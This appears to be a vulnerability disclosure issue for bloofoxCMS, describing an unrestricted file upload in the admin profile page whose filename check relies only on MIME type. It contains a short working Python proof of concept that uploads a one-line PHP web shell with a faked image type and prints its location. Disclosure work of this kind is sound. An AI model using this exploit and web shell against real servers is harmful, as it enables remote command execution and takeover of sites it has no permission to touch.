Open
Description
I found Unrestricted File Upload in http://localhost/bloofoxCMS/admin/index.php?mode=user&action=profile&userid=[ID] -> filename param, the filename param only checks the MIME type which that can be bypassed.
PoC :-
import requests
sid = 'xxxxxxxxxxxxxxxxxxxxxxxxxx' # The Admin Session
url = "http://localhost/bloofoxCMS/bloofoxCMS/admin/index.php?page=myprofile"
data = {'username':'admin','send':'Save'}
r = requests.post(url, data=data, headers={'Cookie':'sid='+sid+';'},files={'filename': ('texst.php', "<?=`$_GET[1]`;", 'image/jpeg')}).text.split('/media/images/profiles/')[1].split("'")[0]
print('Your Shell in http://localhost/bloofoxCMS//admin/media/images/profiles/'+r)Impact
Upload Backdoor PHP Files that leads to control the victim webserver
Metadata
Metadata
Assignees
Labels
No labels